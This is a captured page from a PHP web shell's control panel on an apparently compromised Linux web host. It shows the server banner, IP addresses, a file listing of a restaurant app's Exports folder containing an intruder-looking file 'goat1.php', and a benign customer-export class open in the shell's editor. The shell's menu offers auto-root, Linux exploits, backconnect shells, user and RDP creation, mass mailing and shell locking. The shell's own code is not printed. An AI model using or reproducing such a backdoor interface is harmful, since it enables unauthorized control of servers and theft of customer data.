Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
app /
Exports /
[ HOME SHELL ]
Name
Size
Permission
Action
AdministratorExport.php
1.36
KB
-rwxrwxr-x
ChefExport.php
1.17
KB
-rwxrwxr-x
CreditBalanceReportExport.php
1.26
KB
-rwxrwxr-x
CustomerExport.php
1.26
KB
-rwxrwxr-x
DiningTableExport.php
1.17
KB
-rwxrwxr-x
EmployeeExport.php
1.34
KB
-rwxrwxr-x
ItemCategoryExport.php
1.2
KB
-rwxrwxr-x
ItemExport.php
1.63
KB
-rwxrwxr-x
ItemsReportExport.php
1.47
KB
-rwxrwxr-x
OfferExport.php
1.31
KB
-rwxrwxr-x
OrderExport.php
1.56
KB
-rwxrwxr-x
SalesReportExport.php
1.91
KB
-rwxrwxr-x
TransactionExport.php
1.51
KB
-rwxrwxr-x
WaiterExport.php
1.2
KB
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CustomerExport.php
<?php namespace App\Exports; use App\Enums\Status; use App\Services\CustomerService; use App\Http\Requests\PaginateRequest; use Maatwebsite\Excel\Concerns\WithHeadings; use Maatwebsite\Excel\Concerns\FromCollection; class CustomerExport implements FromCollection, WithHeadings { public CustomerService $customerService; public PaginateRequest $request; public function __construct(CustomerService $customerService, $request) { $this->customerService = $customerService; $this->request = $request; } public function collection() : \Illuminate\Support\Collection { $customerArray = []; $customers = $this->customerService->list($this->request); foreach ($customers as $customer) { $customerArray[] = [ $customer->name, $customer->email, $customer->country_code . '' . $customer->phone, trans('statuse.' . $customer->status), ]; } return collect($customerArray); } public function headings() : array { return [ trans('all.label.name'), trans('all.label.email'), trans('all.label.phone'), trans('all.label.status') ]; } }
Close